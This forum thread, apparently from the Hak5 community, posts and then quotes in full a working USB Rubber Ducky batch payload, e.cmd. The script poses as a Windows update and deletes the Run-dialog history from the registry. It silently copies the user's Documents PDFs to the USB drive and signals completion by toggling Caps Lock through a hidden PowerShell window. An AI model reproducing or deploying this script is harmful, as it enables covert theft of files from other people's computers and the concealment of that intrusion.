Jump to content

Stealing Files with the USB Rubber Ducky Pt 2 – Hak5 2113


kerravon
 Share

Recommended Posts

5 hours ago, Enzym3 said:

Not that I could find, but you can just as easily pause the video at certain times to copy the code yourself.

yeah, but doesnt show complete code

Link to comment
Share on other sites

Hi, I have not flashed my ducky so have not tested the code, but it looks like it's all there.

e.cmd

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dislog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-7,2%%date:~-10,2%_%time:~0,2%%time:~3,2%%time:~6,2%
mkdir %dst% >> nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copuing even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted file to destination that does not support encryption.
REM /Y Suppresses prompting to confrim you want to overwrite an existing destination file
REM /S Copies directories and subdirectories except empty ones.
REM /E Copies directories and subdirectories. Including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >> nul

REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >> nul
)

start /b /wait powershell.exe -nologo -WindowsStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');"

I was playing around with the %time% a little so you may want to change them back

Link to comment
Share on other sites

1 hour ago, Cribbit said:

Hi, I have not flashed my ducky so have not tested the code, but it looks like it's all there.

e.cmd


@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dislog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-7,2%%date:~-10,2%_%time:~0,2%%time:~3,2%%time:~6,2%
mkdir %dst% >> nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copuing even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted file to destination that does not support encryption.
REM /Y Suppresses prompting to confrim you want to overwrite an existing destination file
REM /S Copies directories and subdirectories except empty ones.
REM /E Copies directories and subdirectories. Including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >> nul

REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >> nul
)

start /b /wait powershell.exe -nologo -WindowsStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');"

I was playing around with the %time% a little so you may want to change them back

cheers mate your a superstar

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...